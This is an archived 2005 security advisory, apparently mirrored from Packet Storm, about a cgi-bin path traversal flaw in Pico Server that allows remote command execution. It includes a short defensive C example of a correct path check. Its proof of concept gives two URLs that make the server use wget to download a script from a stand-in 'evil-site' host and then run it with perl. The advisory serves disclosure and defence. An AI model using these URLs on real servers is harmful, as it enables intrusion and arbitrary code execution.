pservBad.txt

14 Aug 2005 00:00:00 | Reported by tsyklon.informatik.rwth-aachen.de | Type: packetstorm | packetstormsecurity.com | 31 Views

Pico Server Remote Command Injection allows a remote attacker to execute arbitrary commands

Related

Reporter | Title | Published | Family
CVE | CVE-2005-1365 | 16 May 2005 04:00 | cve
Cvelist | CVE-2005-1365 | 16 May 2005 04:00 | cvelist
EUVD | EUVD-2005-1368 | 7 Oct 2025 00:30 | euvd
NVD | CVE-2005-1365 | 16 May 2005 04:00 | nvd
securityvulns | [Full-disclosure] Pico Server (pServ) Remote Command Injection | 16 May 2005 00:00 | securityvulns

` Advisory: Pico Server (pServ) Remote Command Injection  
  
RedTeam found a remote command injection in Pico Server (pServ) which results  
in a remote attacker being able to issue arbitrary commands on the server.  
  
Details  
=======  
  
Product: Pico Server (pServ)  
Affected Version: 3.2 (verified), <=3.2 probably too  
Immune Version: 3.3  
OS affected: all  
Security-Risk: very high  
Remote-Exploit: yes  
Vendor-URL: http://pserv.sourceforge.net/  
Vendor-Status: new version available  
Advisory-URL: http://tsyklon.informatik.rwth-aachen.de/redteam/rt-sa-2005-010  
Advisory-Status: published  
CVE: CAN-2005-1365  
(http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1365 #)  
  
  
Introduction  
============  
From http://pserv.sourceforge.net/  
Pico Server is a small web server. It is meant to be portable and  
configurable.  
  
* small, portable  
* fast  
* CGI-BIN support  
* auto-indexing of directories  
* access and error logging (see p-reporter for an analyzer)  
* forking or single-connection at choice  
  
Pico Server (pServ) is written in portable C (K&R style so it can compile on  
older compilers too) and sports several options that by means of #define  
statements can customize the behavior, the performance and the feature set so  
as to better fit the requisites.  
  
If pServ is compiled with support for CGI-BIN a remote attacker is able to  
execute any program (with pServ permissions) on the server by traversing out  
of the cgi-bin directory.  
  
More Details  
============  
  
pServ has CGI-BIN support. Only URLs beginning with "cgi-bin" are treated as  
CGI scripts.  
To prevent a user from traversing out of the cgi-bin directory with the  
traditional /../, pServ parses the requested URL. It increases a counter by  
one when it parses a / (new subdirectory) and decreases the counter when it  
parses /../. If the counter goes below zero, the URL is rejected as illegal.  
Unfortunately, an attacker can avoid being rejected simply by using enough /  
in the URL (without directory names between them), and can then traverse out  
of the cgi-bin directory by adding some /../. This lets the attacker execute  
any program on the server (with pServ permissions).  
  
Proof of Concept  
================  
  
The following url downloads a script (or executable) to the server:  
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/wget?-q+http://evil-site/evil.pl/+-O+/tmp/evil.pl  
  
This is how the script can be executed afterwards:  
http://vuln-host:2000/cgi-bin///////////../../../../../../../../usr/bin/perl?/tmp/evil.pl  
  
  
Workaround  
==========  
  
The only workaround is to compile pServ without support for cgi-bin.  
  
Fix  
===  
  
The developers have released version 3.3. This version should fix the  
problem. The changes have not been tested by RedTeam yet.  
  
Security Risk  
=============  
  
The security risk is rated very high because a remote attacker can use this  
flaw to execute arbitrary code on the server (with the permissions of pServ).  
  
History  
=======  
  
2005-04-29 found  
2005-05-02 first attempt to inform developers  
2005-05-02 CAN-number assigned  
2005-05-04 second attempt to inform developers  
2005-05-16 new version released. Advisory published  
  
RedTeam  
=======  
  
RedTeam is a penetration testing group working at the Laboratory for  
Dependable Distributed Systems at RWTH-Aachen University. You can find more  
information on the RedTeam Project at  
http://tsyklon.informatik.rwth-aachen.de/redteam/  
  
`
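
The counter check described under "More Details", set beside a segment-based check, as an added example in C: it is a reconstruction from the advisory's wording, not pServ source code and not the 3.3 fix. The function names and the constructed sample paths (the part of the URL path after the cgi-bin prefix) are assumptions of this example.

```c
#include <stdio.h>
#include <string.h>

/* Flawed check, reconstructed from the advisory text (not pServ code):
 * every '/' counts as one level down, every "/../" as one level up, and
 * the path is rejected only when the counter drops below zero. */
int naive_depth_ok(const char *rel)
{
    int depth = 0;
    for (const char *p = rel; *p; p++) {
        if (*p != '/')
            continue;
        if (strncmp(p, "/../", 4) == 0 || strcmp(p, "/..") == 0)
            depth--;
        else
            depth++;            /* also counts empty segments ("//") */
        if (depth < 0)
            return 0;
    }
    return 1;
}

/* Segment-based check: only named segments descend. Empty segments and
 * "." are ignored, ".." ascends; reject once depth would go negative. */
int segment_depth_ok(const char *rel)
{
    int depth = 0;
    const char *p = rel;
    while (*p) {
        while (*p == '/')
            p++;                            /* collapse runs of '/' */
        size_t len = strcspn(p, "/");
        if (len == 0)
            break;
        if (len == 2 && p[0] == '.' && p[1] == '.') {
            if (--depth < 0)
                return 0;                   /* would leave cgi-bin */
        } else if (!(len == 1 && p[0] == '.')) {
            depth++;
        }
        p += len;
    }
    return 1;
}

int main(void)
{
    /* Constructed sample: six slashes, three "..", then a file name. */
    const char *padded = "//////../../../prog";
    printf("naive=%d segment=%d\n", naive_depth_ok(padded), segment_depth_ok(padded));
    return 0;
}
```

The padded path passes the reconstructed counter because each empty segment raises the depth, while the segment-based check rejects it at the first `..`. A server would normally also resolve the final file path (for example with `realpath()`) and confirm it still lies under the cgi-bin directory before executing anything.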

14 Aug 2005 00:00 (current)
Vulners AI Score: 6.8 (Medium risk)
EPSS: 0.07343